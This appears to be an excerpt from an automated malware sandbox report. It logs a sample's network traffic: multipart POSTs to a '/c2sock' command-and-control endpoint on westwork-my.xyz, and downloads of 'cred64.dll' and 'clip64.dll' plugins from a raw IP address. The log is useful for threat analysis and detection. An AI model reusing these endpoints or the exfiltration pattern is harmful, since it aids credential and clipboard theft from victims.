Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LrN5GtHA86sHQdAQ2UuzsEo4B4xF5kRaTFN809ISY0U%2FTZHMMJ3xrnqjfjibEPthwn%2BAy%2Bvq7T1LFaRx77ioGwNeTQGohT%2BFC40leGERINIr7R1tnd5yLU3TqIQBUuqchsg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1d91a901a1e-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=mtekmuu8hn327j67k0vs27qbn5; expires=Fri, 17 Nov 2023 16:21:24 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GPjcNzYmKgfVUEMNBNYGwdfoRHQH%2BANr91D76XyQvlXEKBph4jk5Eh9%2B1u0cdaymXUc%2FV3Zqyf3B5vpG0Y9FxRRpan1CVq1Oorrd8fAfLk5HkNU68f4lEITkTFk17PpyHI0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1ddeeb88370-KIX
POST
200
http://westwork-my.xyz/c2sock
REQUEST
RESPONSE
BODY
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 37201
Host: westwork-my.xyz
HTTP/1.1 200 OK
Date: Mon, 24 Jul 2023 22:34:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: PHPSESSID=40liurlv3u8ckan5djrjel2o23; expires=Fri, 17 Nov 2023 16:21:25 GMT; Max-Age=9999999; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=67cNeG5EchRHc0B1Vb5VJCthLA3qxcwLQRhXCJze6z310b7YpCk9sYRpGBSFpdgq8K7BzlIZ4zE%2B%2F40MX0%2BC3TQXsmDF9LX0oQysPKi6O6GxD0JeT6S8v02UCFOJY1qIvhw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ebfa1e33b8a19ca-KIX
GET
404
http://5.42.92.67/norm/Plugins/cred64.dll
REQUEST
RESPONSE
BODY
GET /norm/Plugins/cred64.dll HTTP/1.1
Host: 5.42.92.67
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:50 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
GET
200
http://5.42.92.67/norm/Plugins/clip64.dll
REQUEST
RESPONSE
BODY
GET /norm/Plugins/clip64.dll HTTP/1.1
Host: 5.42.92.67
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 24 Jul 2023 22:34:50 GMT
Content-Type: application/octet-stream
Content-Length: 91136
Last-Modified: Mon, 24 Jul 2023 12:52:18 GMT
Connection: keep-alive
ETag: "64be7402-16400"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts